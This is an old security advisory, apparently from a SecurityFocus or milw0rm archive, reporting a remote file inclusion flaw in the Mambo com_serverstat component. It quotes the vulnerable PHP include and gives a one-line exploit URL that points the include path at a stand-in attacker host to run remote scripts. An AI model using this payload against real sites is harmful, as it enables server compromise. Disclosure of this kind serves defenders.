Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability Sep 14 2006 05:43PM
x0r0n hotmail com
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Author: xoron (turkish hacker)

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Class : Remote

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_ser
verstat/config.serverstat.php");

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig
_absolute_path=http://evil_scripts?

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

+

Thanx : str0ke, Ironfist, Preddy, SHiKaA

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
=-==-=

# milw0rm.com [2006-09-14]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus